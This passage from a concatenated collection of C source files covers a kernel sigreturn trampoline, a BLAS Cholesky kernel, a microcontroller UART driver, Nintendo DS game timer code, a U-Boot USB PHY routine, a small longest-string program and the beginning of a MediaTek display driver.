tracehook_notify_resume(current_frame()); } }
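/*
 * Illustrative sketch (not part of the original file): the 5-byte userspace
 * return trampoline that setup_frame()/setup_rt_frame() above write into
 * frame->retcode, laid out as an array for clarity. Per the comments in
 * those functions, the sequence is "mov #imm16,d0; syscall 0": 0x2c starts
 * the mov with the immediate stored low byte first, and 0xf0 0xe0 is the
 * syscall, so the stub loads the sigreturn syscall number into d0 and traps
 * back into the kernel.
 */
static const unsigned char sigreturn_stub[5] = {
	0x2c,			/* mov #imm16,d0        */
	__NR_sigreturn,		/* low byte of imm16    */
	0x00,			/* high byte of imm16   */
	0xf0, 0xe0,		/* syscall 0            */
};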
397621.c
/*********************************************************************/ /* */ /* Optimized BLAS libraries */ /* By Kazushige Goto <kgoto@tacc.utexas.edu> */ /* */ /* Copyright (c) The University of Texas, 2009. All rights reserved. */ /* UNIVERSITY EXPRESSLY DISCLAIMS ANY AND ALL WARRANTIES CONCERNING */ /* THIS SOFTWARE AND DOCUMENTATION, INCLUDING ANY WARRANTIES OF */ /* MERCHANTABILITY, FITNESS FOR ANY PARTICULAR PURPOSE, */ /* NON-INFRINGEMENT AND WARRANTIES OF PERFORMANCE, AND ANY WARRANTY */ /* THAT MIGHT OTHERWISE ARISE FROM COURSE OF DEALING OR USAGE OF */ /* TRADE. NO WARRANTY IS EITHER EXPRESS OR IMPLIED WITH RESPECT TO */ /* THE USE OF THE SOFTWARE OR DOCUMENTATION. */ /* Under no circumstances shall University be liable for incidental, */ /* special, indirect, direct or consequential damages or loss of */ /* profits, interruption of business, or related expenses which may */ /* arise from use of Software or Documentation, including but not */ /* limited to those resulting from defects in Software and/or */ /* Documentation, or loss or inaccuracy of data of any kind. */ /*********************************************************************/ #include <stdio.h> #include <math.h> #include "common.h" static FLOAT dm1 = -1.; static FLOAT dp1 = 1.; #ifndef SQRT #define SQRT(x) sqrt(x) #endif blasint CNAME(blas_arg_t *args, BLASLONG *range_m, BLASLONG *range_n, FLOAT *sa, FLOAT *sb, BLASLONG myid) { BLASLONG n, lda; FLOAT *a; FLOAT ajj; FLOAT *aoffset; BLASLONG i, j; n = args -> n; a = (FLOAT *)args -> a; lda = args -> lda; if (range_n) { n = range_n[1] - range_n[0]; a += range_n[0] * (lda + 1) * COMPSIZE; } aoffset = a; for (j = 0; j < n; j++) { ajj = *(aoffset + j) - DOTU_K(j, a + j, lda, a + j, lda); if (ajj <= 0){ *(aoffset + j) = ajj; return j + 1; } ajj = SQRT(ajj); *(aoffset + j) = ajj; i = n - j - 1; if (i > 0) { GEMV_N(i, j, 0, dm1, a + j + 1, lda, a + j, lda, aoffset + j + 1, 1, sb); SCAL_K(i, 0, 0, dp1 / ajj, aoffset + j + 1, 1, NULL, 0, NULL, 0); } aoffset += lda; } return 0; }
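/* Illustrative reference (not part of the original library): the recurrence
   the kernel above drives through DOTU_K/GEMV_N/SCAL_K, written as plain C
   for a real, column-major matrix. This sketch assumes double precision and
   textbook unblocked Cholesky (A = L*L^T); it documents the algorithm, not
   the GotoBLAS internals. <math.h> is already included above. */

static int chol_unblocked_sketch(int n, double *a, int lda)
{
  int i, j, k;
  double ajj, s;

  for (j = 0; j < n; j++) {
    /* ajj = A[j][j] - dot(row j, row j) over the already-computed columns */
    ajj = a[j + j * lda];
    for (k = 0; k < j; k++)
      ajj -= a[j + k * lda] * a[j + k * lda];
    if (ajj <= 0.)
      return j + 1;                 /* same error convention as above */
    ajj = sqrt(ajj);
    a[j + j * lda] = ajj;

    /* column update (the GEMV step) and scaling (the SCAL step) */
    for (i = j + 1; i < n; i++) {
      s = a[i + j * lda];
      for (k = 0; k < j; k++)
        s -= a[i + k * lda] * a[j + k * lda];
      a[i + j * lda] = s / ajj;
    }
  }
  return 0;
}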
437968.c
/** ****************************************************************************** * @file HAL_uart.c * @author AE Team * @version V1.1.1 * @date 15/05/2019 * @brief This file provides all the UART firmware functions. ****************************************************************************** * @copy * * THE PRESENT FIRMWARE WHICH IS FOR GUIDANCE ONLY AIMS AT PROVIDING CUSTOMERS * WITH CODING INFORMATION REGARDING THEIR PRODUCTS IN ORDER FOR THEM TO SAVE * TIME. AS A RESULT, MindMotion SHALL NOT BE HELD LIABLE FOR ANY * DIRECT, INDIRECT OR CONSEQUENTIAL DAMAGES WITH RESPECT TO ANY CLAIMS ARISING * FROM THE CONTENT OF SUCH FIRMWARE AND/OR THE USE MADE BY CUSTOMERS OF THE * CODING INFORMATION CONTAINED HEREIN IN CONNECTION WITH THEIR PRODUCTS. * * <h2><center>&copy; COPYRIGHT 2019 MindMotion</center></h2> */ /* Includes ------------------------------------------------------------------*/ #include "HAL_uart.h" #include "HAL_rcc.h" /** @addtogroup StdPeriph_Driver * @{ */ /** @defgroup UART * @brief UART driver modules * @{ */ /** @defgroup UART_Private_TypesDefinitions * @{ */ /** * @} */ /** @defgroup UART_Private_Defines * @{ */ /* UART UE Mask */ #define GCR_UE_Set ((uint16_t)0x0001) /* UART Enable Mask */ #define GCR_UE_Reset ((uint16_t)0xFFFE) /* UART Disable Mask */ #define CCR_CLEAR_Mask ((uint32_t)0xFFFFFF30) /* UART CCR Mask */ #define GCR_CLEAR_Mask ((uint32_t)0xFFFFFFE0) /* UART GCR Mask */ /** * @} */ /** @defgroup UART_Private_Macros * @{ */ /** * @} */ /** @defgroup UART_Private_Variables * @{ */ /** * @} */ /** @defgroup UART_Private_FunctionPrototypes * @{ */ /** * @} */ /** @defgroup UART_Private_Functions * @{ */ /** * @brief Deinitializes the UARTx peripheral registers to their * default reset values. * @param UARTx: Select the UART or the UART peripheral. * This parameter can be one of the following values: * UART1, UART2. * @retval : None */ void UART_DeInit(UART_TypeDef *UARTx) { /* Check the parameters */ assert_param(IS_UART_ALL_PERIPH(UARTx)); #ifdef UART2 if(UART2 == UARTx) { RCC_APB1PeriphResetCmd(RCC_APB1Periph_UART2, ENABLE); RCC_APB1PeriphResetCmd(RCC_APB1Periph_UART2, DISABLE); } #endif #ifdef UART1 if(UART1 == UARTx) { RCC_APB2PeriphResetCmd(RCC_APB2Periph_UART1, ENABLE); RCC_APB2PeriphResetCmd(RCC_APB2Periph_UART1, DISABLE); } #endif } /** * @brief Initializes the UARTx peripheral according to the specified * parameters in the UART_InitStruct . * @param UARTx: Select the UART or the UART peripheral. * This parameter can be one of the following values: * UART1, UART2. * @param UART_InitStruct: pointer to a UART_InitTypeDef structure * that contains the configuration information for the * specified UART peripheral. 
 * @retval : None
 */
void UART_Init(UART_TypeDef *UARTx, UART_InitTypeDef *UART_InitStruct)
{
    uint32_t tmpreg = 0x00, apbclock = 0x00;
    uint32_t tmpreg1 = 0x00;
    uint32_t UARTxbase = 0;
    RCC_ClocksTypeDef RCC_ClocksStatus;
    /* Check the parameters */
    assert_param(IS_UART_ALL_PERIPH(UARTx));
    assert_param(IS_UART_BAUDRATE(UART_InitStruct->UART_BaudRate));
    assert_param(IS_UART_WORD_LENGTH(UART_InitStruct->UART_WordLength));
    assert_param(IS_UART_STOPBITS(UART_InitStruct->UART_StopBits));
    assert_param(IS_UART_PARITY(UART_InitStruct->UART_Parity));
    assert_param(IS_UART_MODE(UART_InitStruct->UART_Mode));
    assert_param(IS_UART_HARDWARE_FLOW_CONTROL(UART_InitStruct->UART_HardwareFlowControl));

    UARTxbase = (*(uint32_t *)&UARTx);

    /*---------------------------- UART CCR Configuration -----------------------*/
    /* get UART CCR values */
    tmpreg = UARTx->CCR;
    /* Clear spb, psel, pen bits */
    tmpreg &= CCR_CLEAR_Mask;
    /* Configure the UART Word Length, Stop Bits and Parity ------------*/
    /* Set the char bits according to UART_WordLength value */
    /* Set spb bit according to UART_StopBits value */
    /* Set PEN bit according to UART_Parity value */
    tmpreg |= (uint32_t)UART_InitStruct->UART_WordLength | (uint32_t)UART_InitStruct->UART_StopBits |
              UART_InitStruct->UART_Parity;
    /* Write to UART CCR */
    UARTx->CCR = tmpreg;

    /*---------------------------- UART GCR Configuration -----------------------*/
    /* get UART GCR values */
    tmpreg = UARTx->GCR;
    /* Clear txen, rxen, autoflowen, mode, uarten bits */
    tmpreg &= GCR_CLEAR_Mask;
    /* Set autoflowen bit according to UART_HardwareFlowControl value */
    /* Set rxen, txen bits according to UART_Mode value */
    tmpreg |= UART_InitStruct->UART_HardwareFlowControl | UART_InitStruct->UART_Mode;
    /* Write to UART GCR */
    UARTx->GCR = tmpreg;

    /*---------------------------- UART BRR Configuration -----------------------*/
    /* Configure the UART Baud Rate -------------------------------------------*/
    RCC_GetClocksFreq(&RCC_ClocksStatus);
    if (UARTxbase == UART2_BASE)
    {
        apbclock = RCC_ClocksStatus.PCLK1_Frequency;
    }
    else
    {
        apbclock = RCC_ClocksStatus.PCLK2_Frequency;
    }
    /* Determine the integer and fractional parts of the baud rate divisor */
    tmpreg = (apbclock / UART_InitStruct->UART_BaudRate) / 16;
    tmpreg1 = (apbclock / UART_InitStruct->UART_BaudRate) % 16;
    UARTx->BRR = tmpreg;
    UARTx->FRA = tmpreg1;
}

/**
 * @brief  Fills each UART_InitStruct member with its default value.
 * @param UART_InitStruct: pointer to a UART_InitTypeDef structure
 *   which will be initialized.
 * @retval : None
 */
void UART_StructInit(UART_InitTypeDef *UART_InitStruct)
{
    /* UART_InitStruct members default value */
    UART_InitStruct->UART_BaudRate = 9600;
    UART_InitStruct->UART_WordLength = UART_WordLength_8b;
    UART_InitStruct->UART_StopBits = UART_StopBits_1;
    UART_InitStruct->UART_Parity = UART_Parity_No;
    UART_InitStruct->UART_Mode = UART_Mode_Rx | UART_Mode_Tx;
    UART_InitStruct->UART_HardwareFlowControl = UART_HardwareFlowControl_None;
}

/**
 * @brief  Enables or disables the specified UART peripheral.
 * @param UARTx: Select the UART or the UART peripheral.
 *   This parameter can be one of the following values:
 *   UART1, UART2.
 * @param NewState: new state of the UARTx peripheral.
 *   This parameter can be: ENABLE or DISABLE.
 * @retval : None
 */
void UART_Cmd(UART_TypeDef *UARTx, FunctionalState NewState)
{
    /* Check the parameters */
    assert_param(IS_UART_ALL_PERIPH(UARTx));
    assert_param(IS_FUNCTIONAL_STATE(NewState));
    if (NewState != DISABLE)
    {
        /* Enable the selected UART by setting the uarten bit in the GCR register */
        UARTx->GCR |= GCR_UE_Set;
    }
    else
    {
        /* Disable the selected UART by clearing the uarten bit in the GCR register */
        UARTx->GCR &= GCR_UE_Reset;
    }
}

/**
 * @brief  Enables or disables the specified UART interrupts.
 * @param UARTx: Select the UART or the UART peripheral.
 *   This parameter can be one of the following values:
 *   UART1, UART2.
 * @param UART_IT: specifies the UART interrupt sources to be
 *   enabled or disabled.
 *   This parameter can be one of the following values:
 *   @arg UART_IT_ERR: Error interrupt (frame error)
 *   @arg UART_IT_PE: Parity error interrupt
 *   @arg UART_OVER_ERR: Overrun error interrupt
 *   @arg UART_TIMEOUT_ERR: Timeout error interrupt
 *   @arg UART_IT_RXIEN: Receive Data register interrupt
 *   @arg UART_IT_TXIEN: Transmit Data register empty interrupt
 * @param NewState: new state of the specified UARTx interrupts.
 *   This parameter can be: ENABLE or DISABLE.
 * @retval : None
 */
void UART_ITConfig(UART_TypeDef *UARTx, uint16_t UART_IT, FunctionalState NewState)
{
    /* Check the parameters */
    assert_param(IS_UART_ALL_PERIPH(UARTx));
    assert_param(IS_UART_CONFIG_IT(UART_IT));
    assert_param(IS_FUNCTIONAL_STATE(NewState));
    if (NewState != DISABLE)
    {
        /* Enable the UART_IT interrupt */
        UARTx->IER |= UART_IT;
    }
    else
    {
        /* Disable the UART_IT interrupt */
        UARTx->IER &= ~UART_IT;
    }
}

/**
 * @brief  Enables or disables the UART's DMA interface.
 * @param UARTx: Select the UART or the UART peripheral.
 *   This parameter can be one of the following values:
 *   UART1, UART2.
 * @param UART_DMAReq: specifies the DMA request.
 *   This parameter can be any combination of the following values:
 *   @arg UART_DMAReq_EN: UART DMA transmit request
 * @param NewState: new state of the DMA Request sources.
 *   This parameter can be: ENABLE or DISABLE.
 * @retval : None
 */
void UART_DMACmd(UART_TypeDef *UARTx, uint16_t UART_DMAReq, FunctionalState NewState)
{
    /* Check the parameters */
    assert_param(IS_UART_1234_PERIPH(UARTx));
    assert_param(IS_UART_DMAREQ(UART_DMAReq));
    assert_param(IS_FUNCTIONAL_STATE(NewState));
    if (NewState != DISABLE)
    {
        /* Enable the DMA transfer */
        UARTx->GCR |= UART_DMAReq;
    }
    else
    {
        /* Disable the DMA transfer */
        UARTx->GCR &= ~UART_DMAReq;
    }
}

/**
 * @brief  Transmits single data through the UARTx peripheral.
 * @param UARTx: Select the UART or the UART peripheral.
 *   This parameter can be one of the following values:
 *   UART1, UART2.
 * @param Data: the data to transmit.
 * @retval : None
 */
void UART_SendData(UART_TypeDef *UARTx, uint16_t Data)
{
    /* Check the parameters */
    assert_param(IS_UART_ALL_PERIPH(UARTx));
    assert_param(IS_UART_DATA(Data));
    /* Transmit Data */
    UARTx->TDR = (Data & (uint16_t)0x00FF);
}

/**
 * @brief  Returns the most recent received data by the UARTx peripheral.
 * @param UARTx: Select the UART or the UART peripheral.
 *   This parameter can be one of the following values:
 *   UART1, UART2.
 * @retval : The received data.
 */
uint16_t UART_ReceiveData(UART_TypeDef *UARTx)
{
    /* Check the parameters */
    assert_param(IS_UART_ALL_PERIPH(UARTx));
    /* Receive Data */
    return (uint16_t)(UARTx->RDR & (uint16_t)0x00FF);
}

/**
 * @brief  Checks whether the specified UART flag is set or not.
 * @param UARTx: Select the UART or the UART peripheral.
 *   This parameter can be one of the following values:
 *   UART1, UART2.
 * @param UART_FLAG: specifies the flag to check.
 *   This parameter can be one of the following values:
 *   @arg UART_FLAG_TXEMPTY: Transmit data register empty flag
 *   @arg UART_FLAG_TXFULL: Transmit data buffer full flag
 *   @arg UART_FLAG_RXAVL: RX buffer has a byte flag
 *   @arg UART_FLAG_OVER: Overrun error flag
 *   @arg UART_FLAG_TXEPT: TX register and shifter are empty flag
 * @retval : The new state of UART_FLAG (SET or RESET).
 */
FlagStatus UART_GetFlagStatus(UART_TypeDef *UARTx, uint16_t UART_FLAG)
{
    FlagStatus bitstatus = RESET;
    /* Check the parameters */
    assert_param(IS_UART_ALL_PERIPH(UARTx));
    assert_param(IS_UART_FLAG(UART_FLAG));
    if ((UARTx->CSR & UART_FLAG) != (uint16_t)RESET)
    {
        bitstatus = SET;
    }
    else
    {
        bitstatus = RESET;
    }
    return bitstatus;
}

/**
 * @brief  Clears the UARTx's pending flags.
 * @param UARTx: Select the UART or the UART peripheral.
 *   This parameter can be one of the following values:
 *   UART1, UART2.
 * @param UART_FLAG: specifies the flag to clear.
 *   This parameter can be any combination of the following values:
 *   @arg UART_FLAG_TXEMPTY: Transmit data register empty flag
 *   @arg UART_FLAG_TXFULL: Transmit data buffer full flag
 *   @arg UART_FLAG_RXAVL: RX buffer has a byte flag
 *   @arg UART_FLAG_OVER: Overrun error flag
 *   @arg UART_FLAG_TXEPT: TX register and shifter are empty flag
 * @retval : None
 */
void UART_ClearFlag(UART_TypeDef *UARTx, uint16_t UART_FLAG)
{
    /* The CSR status flags on this device are maintained by hardware and
     * cannot be cleared by software; this empty function is kept for API
     * compatibility. */
}

/**
 * @brief  Checks whether the specified UART interrupt has occurred or not.
 * @param UARTx: Select the UART or the UART peripheral.
 *   This parameter can be one of the following values:
 *   UART1, UART2.
 * @param UART_IT: specifies the UART interrupt source to check.
 *   This parameter can be one of the following values:
 *   @arg UART_IT_ERR: Error interrupt (frame error)
 *   @arg UART_IT_PE: Parity error interrupt
 *   @arg UART_OVER_ERR: Overrun error interrupt
 *   @arg UART_TIMEOUT_ERR: Timeout error interrupt
 *   @arg UART_IT_RXIEN: Receive Data register interrupt
 *   @arg UART_IT_TXIEN: Transmit Data register empty interrupt
 * @retval : The new state of UART_IT (SET or RESET).
 */
ITStatus UART_GetITStatus(UART_TypeDef *UARTx, uint16_t UART_IT)
{
    FlagStatus bitstatus = RESET;
    /* Check the parameters */
    assert_param(IS_UART_ALL_PERIPH(UARTx));
    assert_param(IS_UART_CONFIG_IT(UART_IT));
    if ((UARTx->ISR & UART_IT) != (uint16_t)RESET)
    {
        bitstatus = SET;
    }
    else
    {
        bitstatus = RESET;
    }
    return bitstatus;
}

/**
 * @brief  Clears the UARTx's interrupt pending bits.
 * @param UARTx: Select the UART or the UART peripheral.
 *   This parameter can be one of the following values:
 *   UART1, UART2.
 * @param UART_IT: specifies the interrupt pending bit to clear.
 *   This parameter can be one of the following values:
 *   @arg UART_IT_ERR: Error interrupt (frame error)
 *   @arg UART_IT_PE: Parity error interrupt
 *   @arg UART_OVER_ERR: Overrun error interrupt
 *   @arg UART_TIMEOUT_ERR: Timeout error interrupt
 *   @arg UART_IT_RXIEN: Receive Data register interrupt
 *   @arg UART_IT_TXIEN: Transmit Data register empty interrupt
 * @retval : None
 */
void UART_ClearITPendingBit(UART_TypeDef *UARTx, uint16_t UART_IT)
{
    /* Check the parameters */
    assert_param(IS_UART_ALL_PERIPH(UARTx));
    assert_param(IS_UART_CLEAR_IT(UART_IT));
    /* Clear the UART_IT pending bits */
    UARTx->ICR = UART_IT;
}

/**
 * @}
 */

/**
 * @}
 */

/**
 * @}
 */

/*-------------------------(C) COPYRIGHT 2019 MindMotion ----------------------*/
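/*
 * Illustrative usage sketch (not part of the vendor driver): bringing up
 * UART1 at 115200-8-N-1 with the functions above and sending one byte.
 * RCC_APB2PeriphClockCmd is assumed to be the matching clock-enable helper
 * from HAL_rcc.h; GPIO pin muxing is board specific and elided.
 */
static void uart1_usage_sketch(void)
{
    UART_InitTypeDef init;

    RCC_APB2PeriphClockCmd(RCC_APB2Periph_UART1, ENABLE); /* assumed helper */

    UART_StructInit(&init);          /* 9600-8-N-1 defaults */
    init.UART_BaudRate = 115200;
    UART_Init(UART1, &init);
    UART_Cmd(UART1, ENABLE);

    UART_SendData(UART1, 'A');
    /* Busy-wait until the TX register and shifter are empty. */
    while (UART_GetFlagStatus(UART1, UART_FLAG_TXEPT) == RESET)
        ;
}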
216950.c
/*
 * Created on: Dec 11, 2018
 *     Author: nds
 */

#include "timer_game.h"
#include "graphics_sub.h"
#include "game.h"

int msec, sec, min, overSec;
int audioCycles = 0;
soundEffectType currentSF;

void init_timers(){
	TIMER_DATA(0) = TIMER_FREQ(100);
	TIMER0_CR = TIMER_ENABLE | TIMER_DIV_64 | TIMER_IRQ_REQ;
	irqSet(IRQ_TIMER0, timer0_ISR);

	TIMER_DATA(1) = TIMER_FREQ(60);
	TIMER1_CR = TIMER_ENABLE | TIMER_DIV_64 | TIMER_IRQ_REQ;
	irqSet(IRQ_TIMER1, timer1_ISR);
}

void restart_timer(){
	msec = 0;
	sec = 0;
	min = 0;
}

void timer0_ISR() {
	if (msec < 1000)
		msec += 10;
	else {
		msec = 0;
		if (sec < 60){
			sec++;
			// the player loses fuel while waiting and doing nothing
			player_fuel--;
			if(gameOver)
				overSec++;
		}
		else {
			sec = 0;
			if (min < 60)
				min++;
			else
				min = 0;
		}
	}
	drilling = false;
}

void timer1_ISR() {
	flying = 0;
	print_fuel(20, 5, 12);
	print_drill_health(20, 9, 12);

	// sound effect state machine
	if (audioCycles == 0 && nextSF != NONE) {
		currentSF = nextSF;
		nextSF = NONE;
	}
	switch (currentSF){
	case COIN:
		Audio_PlaySoundEX(SFX_COIN_PICKUP);
		audioCycles = 10;
		currentSF = NONE;
		break;
	case DRILL:
		Audio_PlaySoundEX(SFX_BULLDOZER);
		audioCycles = 10;
		currentSF = NONE;
		break;
	default:
		if (audioCycles != 0)
			audioCycles--;
		break;
	}
}
823261.c
// SPDX-License-Identifier: GPL-2.0+ /* * drivers/usb/gadget/dwc2_udc_otg.c * Designware DWC2 on-chip full/high speed USB OTG 2.0 device controllers * * Copyright (C) 2008 for Samsung Electronics * * BSP Support for Samsung's UDC driver * available at: * git://git.kernel.org/pub/scm/linux/kernel/git/kki_ap/linux-2.6-samsung.git * * State machine bugfixes: * Marek Szyprowski <m.szyprowski@samsung.com> * * Ported to u-boot: * Marek Szyprowski <m.szyprowski@samsung.com> * Lukasz Majewski <l.majewski@samsumg.com> */ #include <common.h> #include <linux/errno.h> #include <linux/list.h> #include <malloc.h> #include <linux/usb/ch9.h> #include <linux/usb/gadget.h> #include <asm/byteorder.h> #include <asm/unaligned.h> #include <asm/io.h> #include <asm/mach-types.h> #include "dwc2_udc_otg_regs.h" #include "dwc2_udc_otg_priv.h" #include <usb/dwc2_udc.h> void otg_phy_init(struct dwc2_udc *dev) { unsigned int usb_phy_ctrl = dev->pdata->usb_phy_ctrl; struct dwc2_usbotg_phy *phy = (struct dwc2_usbotg_phy *)dev->pdata->regs_phy; dev->pdata->phy_control(1); /* USB PHY0 Enable */ printf("USB PHY0 Enable\n"); /* Enable PHY */ writel(readl(usb_phy_ctrl) | USB_PHY_CTRL_EN0, usb_phy_ctrl); if (dev->pdata->usb_flags == PHY0_SLEEP) /* C210 Universal */ writel((readl(&phy->phypwr) &~(PHY_0_SLEEP | OTG_DISABLE_0 | ANALOG_PWRDOWN) &~FORCE_SUSPEND_0), &phy->phypwr); else /* C110 GONI */ writel((readl(&phy->phypwr) &~(OTG_DISABLE_0 | ANALOG_PWRDOWN) &~FORCE_SUSPEND_0), &phy->phypwr); if (s5p_cpu_id == 0x4412) writel((readl(&phy->phyclk) & ~(EXYNOS4X12_ID_PULLUP0 | EXYNOS4X12_COMMON_ON_N0)) | EXYNOS4X12_CLK_SEL_24MHZ, &phy->phyclk); /* PLL 24Mhz */ else writel((readl(&phy->phyclk) & ~(ID_PULLUP0 | COMMON_ON_N0)) | CLK_SEL_24MHZ, &phy->phyclk); /* PLL 24Mhz */ writel((readl(&phy->rstcon) &~(LINK_SW_RST | PHYLNK_SW_RST)) | PHY_SW_RST0, &phy->rstcon); udelay(10); writel(readl(&phy->rstcon) &~(PHY_SW_RST0 | LINK_SW_RST | PHYLNK_SW_RST), &phy->rstcon); udelay(10); } void otg_phy_off(struct dwc2_udc *dev) { unsigned int usb_phy_ctrl = dev->pdata->usb_phy_ctrl; struct dwc2_usbotg_phy *phy = (struct dwc2_usbotg_phy *)dev->pdata->regs_phy; /* reset controller just in case */ writel(PHY_SW_RST0, &phy->rstcon); udelay(20); writel(readl(&phy->phypwr) &~PHY_SW_RST0, &phy->rstcon); udelay(20); writel(readl(&phy->phypwr) | OTG_DISABLE_0 | ANALOG_PWRDOWN | FORCE_SUSPEND_0, &phy->phypwr); writel(readl(usb_phy_ctrl) &~USB_PHY_CTRL_EN0, usb_phy_ctrl); writel((readl(&phy->phyclk) & ~(ID_PULLUP0 | COMMON_ON_N0)), &phy->phyclk); udelay(10000); dev->pdata->phy_control(0); }
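/*
 * Illustrative sketch (not part of the original driver): the repeated
 * read-modify-write sequences above can also be written with U-Boot's
 * clrbits_le32() helper from <asm/io.h>, shown here for the PHY power-up
 * step only. This assumes the PHY registers are little-endian memory-mapped
 * I/O, as the readl()/writel() accessors above imply.
 */
static inline void otg_phy_power_up_sketch(struct dwc2_usbotg_phy *phy)
{
	/* clear the sleep, disable, power-down and suspend bits in one go */
	clrbits_le32(&phy->phypwr,
		     PHY_0_SLEEP | OTG_DISABLE_0 | ANALOG_PWRDOWN |
		     FORCE_SUSPEND_0);
}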
717285.c
#include <stdio.h> int tamstring(char *string, int tam){ int i = 0; while(string[i] != '\0'){ tam++; i++; } return tam; } int main(){ char string[1001]; char stringmaior[1001]; int maiortam = 0, tam = 0, qtdstrings, tamres; scanf("%d", &qtdstrings); for(int i = 0; i<qtdstrings; i++){ scanf(" %s", string); tamres = tamstring(string, tam); if(tamres > maiortam){ maiortam = tamres; for(int i = 0; i<tamres; i++) stringmaior[i] = string[i]; } } for(int i = 0; i<maiortam; i++) if(i == maiortam-1) printf("%c\n", stringmaior[i]); else printf("%c", stringmaior[i]); return 0; }
804527.c
// SPDX-License-Identifier: GPL-2.0-only /* * Copyright (c) 2015 MediaTek Inc. */ #include <linux/clk.h> #include <linux/iopoll.h> #include <linux/module.h> #include <linux/of_device.h> #include <linux/platform_device.h> #include <linux/regmap.h> #include "mtk_drm_ddp.h" #include "mtk_drm_ddp_comp.h" #define MT2701_DISP_MUTEX0_MOD0 0x2c #define MT2701_DISP_MUTEX0_SOF0 0x30 #define DISP_REG_MUTEX_EN(n) (0x20 + 0x20 * (n)) #define DISP_REG_MUTEX(n) (0x24 + 0x20 * (n)) #define DISP_REG_MUTEX_RST(n) (0x28 + 0x20 * (n)) #define DISP_REG_MUTEX_MOD(mutex_mod_reg, n) (mutex_mod_reg + 0x20 * (n)) #define DISP_REG_MUTEX_SOF(mutex_sof_reg, n) (mutex_sof_reg + 0x20 * (n)) #define DISP_REG_MUTEX_MOD2(n) (0x34 + 0x20 * (n)) #define INT_MUTEX BIT(1) #define MT8173_MUTEX_MOD_DISP_OVL0 11 #define MT8173_MUTEX_MOD_DISP_OVL1 12 #define MT8173_MUTEX_MOD_DISP_RDMA0 13 #define MT8173_MUTEX_MOD_DISP_RDMA1 14 #define MT8173_MUTEX_MOD_DISP_RDMA2 15 #define MT8173_MUTEX_MOD_DISP_WDMA0 16 #define MT8173_MUTEX_MOD_DISP_WDMA1 17 #define MT8173_MUTEX_MOD_DISP_COLOR0 18 #define MT8173_MUTEX_MOD_DISP_COLOR1 19 #define MT8173_MUTEX_MOD_DISP_AAL 20 #define MT8173_MUTEX_MOD_DISP_GAMMA 21 #define MT8173_MUTEX_MOD_DISP_UFOE 22 #define MT8173_MUTEX_MOD_DISP_PWM0 23 #define MT8173_MUTEX_MOD_DISP_PWM1 24 #define MT8173_MUTEX_MOD_DISP_OD 25 #define MT2712_MUTEX_MOD_DISP_PWM2 10 #define MT2712_MUTEX_MOD_DISP_OVL0 11 #define MT2712_MUTEX_MOD_DISP_OVL1 12 #define MT2712_MUTEX_MOD_DISP_RDMA0 13 #define MT2712_MUTEX_MOD_DISP_RDMA1 14 #define MT2712_MUTEX_MOD_DISP_RDMA2 15 #define MT2712_MUTEX_MOD_DISP_WDMA0 16 #define MT2712_MUTEX_MOD_DISP_WDMA1 17 #define MT2712_MUTEX_MOD_DISP_COLOR0 18 #define MT2712_MUTEX_MOD_DISP_COLOR1 19 #define MT2712_MUTEX_MOD_DISP_AAL0 20 #define MT2712_MUTEX_MOD_DISP_UFOE 22 #define MT2712_MUTEX_MOD_DISP_PWM0 23 #define MT2712_MUTEX_MOD_DISP_PWM1 24 #define MT2712_MUTEX_MOD_DISP_OD0 25 #define MT2712_MUTEX_MOD2_DISP_AAL1 33 #define MT2712_MUTEX_MOD2_DISP_OD1 34 #define MT2701_MUTEX_MOD_DISP_OVL 3 #define MT2701_MUTEX_MOD_DISP_WDMA 6 #define MT2701_MUTEX_MOD_DISP_COLOR 7 #define MT2701_MUTEX_MOD_DISP_BLS 9 #define MT2701_MUTEX_MOD_DISP_RDMA0 10 #define MT2701_MUTEX_MOD_DISP_RDMA1 12 #define MUTEX_SOF_SINGLE_MODE 0 #define MUTEX_SOF_DSI0 1 #define MUTEX_SOF_DSI1 2 #define MUTEX_SOF_DPI0 3 #define MUTEX_SOF_DPI1 4 #define MUTEX_SOF_DSI2 5 #define MUTEX_SOF_DSI3 6 struct mtk_disp_mutex { int id; bool claimed; }; enum mtk_ddp_mutex_sof_id { DDP_MUTEX_SOF_SINGLE_MODE, DDP_MUTEX_SOF_DSI0, DDP_MUTEX_SOF_DSI1, DDP_MUTEX_SOF_DPI0, DDP_MUTEX_SOF_DPI1, DDP_MUTEX_SOF_DSI2, DDP_MUTEX_SOF_DSI3, }; struct mtk_ddp_data { const unsigned int *mutex_mod; const unsigned int *mutex_sof; const unsigned int mutex_mod_reg; const unsigned int mutex_sof_reg; const bool no_clk; }; struct mtk_ddp { struct device *dev; struct clk *clk; void __iomem *regs; struct mtk_disp_mutex mutex[10]; const struct mtk_ddp_data *data; }; static const unsigned int mt2701_mutex_mod[DDP_COMPONENT_ID_MAX] = { [DDP_COMPONENT_BLS] = MT2701_MUTEX_MOD_DISP_BLS, [DDP_COMPONENT_COLOR0] = MT2701_MUTEX_MOD_DISP_COLOR, [DDP_COMPONENT_OVL0] = MT2701_MUTEX_MOD_DISP_OVL, [DDP_COMPONENT_RDMA0] = MT2701_MUTEX_MOD_DISP_RDMA0, [DDP_COMPONENT_RDMA1] = MT2701_MUTEX_MOD_DISP_RDMA1, [DDP_COMPONENT_WDMA0] = MT2701_MUTEX_MOD_DISP_WDMA, }; static const unsigned int mt2712_mutex_mod[DDP_COMPONENT_ID_MAX] = { [DDP_COMPONENT_AAL0] = MT2712_MUTEX_MOD_DISP_AAL0, [DDP_COMPONENT_AAL1] = MT2712_MUTEX_MOD2_DISP_AAL1, [DDP_COMPONENT_COLOR0] = MT2712_MUTEX_MOD_DISP_COLOR0, 
